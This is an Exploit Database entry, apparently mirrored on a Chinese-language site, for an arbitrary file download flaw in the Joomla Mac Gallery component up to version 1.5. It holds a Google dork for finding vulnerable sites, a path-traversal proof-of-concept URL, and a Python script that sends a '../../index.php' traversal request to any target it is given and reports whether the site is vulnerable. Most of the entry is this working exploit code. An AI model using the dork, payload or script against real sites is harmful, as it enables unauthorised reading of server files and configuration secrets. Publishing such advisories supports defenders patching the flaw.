Joomla! Component com_macgallery 1.5 – Arbitrary File Download

• Exploit Database
• 9 阅读

• 作者： Claudio Viviani
  日期： 2014-09-24
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/34755/

• ######################
  
  # Exploit Title : Joomla Mac Gallery <= 1.5 Arbitrary File Download
  
  # Exploit Author : Claudio Viviani
  
  # Vendor Homepage : https://www.apptha.com
  
  # Software Link : https://www.apptha.com/downloadable/download/sample/sample_id/18
  
  # Dork Google: inurl:option=com_macgallery
  
  # Date : 2014-09-17
  
  # Tested on : Windows 7 / Mozilla Firefox
  
  # Linux / Mozilla Firefox
  
  # Info:
  
  # Joomla Mac Gallery suffers from Arbitrary File Download vulnerability
  
  # PoC Exploit:
  
  #http://localhost/index.php?option=com_macgallery&view=download&albumid=[../../filename]
  
  #"album_id" variable is not sanitized.
  
  ######################
  
  #!/usr/bin/env python
  
  # http connection
  import urllib, urllib2
  # Args management
  import optparse
  # Error managemen
  import sys
  
  banner = """
   ____ ___ ___
  |__.-----.-----.--------|.---.-. | Y .---.-.----.
  ||_|_|||_| |.|_|__|
  ||_____|_____|__|__|__|__|___._| |. \_/|___._|____|
   |___| |:| |
   |::.|:. |
   `--- ---'
  _______ __ ______________
   | _ .---.-||.-----.----.--.--. | _ || _ |
   |.|___|_|||-__| _||| |.| |__| 1___|
   |.| |___._|__|__|_____|__| |___| `-|.|__|____ |
   |:1 ||_____| |:||:1 |
   |::.. . ||::.||::.. . |
   `-------'`---'`-------'
  
  j00ml4 M4c G4ll3ry <= 1.5 4rb1tr4ry F1l3 D0wnl04d
  
  Written by:
  
  Claudio Viviani
  
   http://www.homelab.it
  
  info@homelab.it
  homelabit@protonmail.ch
  
   https://www.facebook.com/homelabit
  https://twitter.com/homelabit
   https://plus.google.com/+HomelabIt1/
   https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
  """
  
  # Check url
  def checkurl(url):
  if url[:8] != "https://" and url[:7] != "http://":
  print('[X] You must insert http:// or https:// procotol')
  sys.exit(1)
  else:
  return url
  
  def connection(url,pathtrav):
  try:
  response = urllib2.urlopen(url+'/index.php?option=com_macgallery&view=download&albumid='+pathtrav+'index.php')
  content = response.read()
  if content != "":
  print '[!] VULNERABLE'
  print '[+] '+url+'/index.php?option=com_macgallery&view=download&albumid='+pathtrav+'index.php'
  else:
  print '[X] Not Vulnerable'
  except urllib2.HTTPError:
  print '[X] HTTP Error'
  except urllib2.URLError:
  print '[X] Connection Error'
  
  commandList = optparse.OptionParser('usage: %prog -t URL')
  commandList.add_option('-t', '--target', action="store",
  help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
  )
  options, remainder = commandList.parse_args()
  
  # Check args
  if not options.target:
  print(banner)
  commandList.print_help()
  sys.exit(1)
  
  print(banner)
  
  url = checkurl(options.target)
  pathtrav = "../../"
  
  connection(url,pathtrav)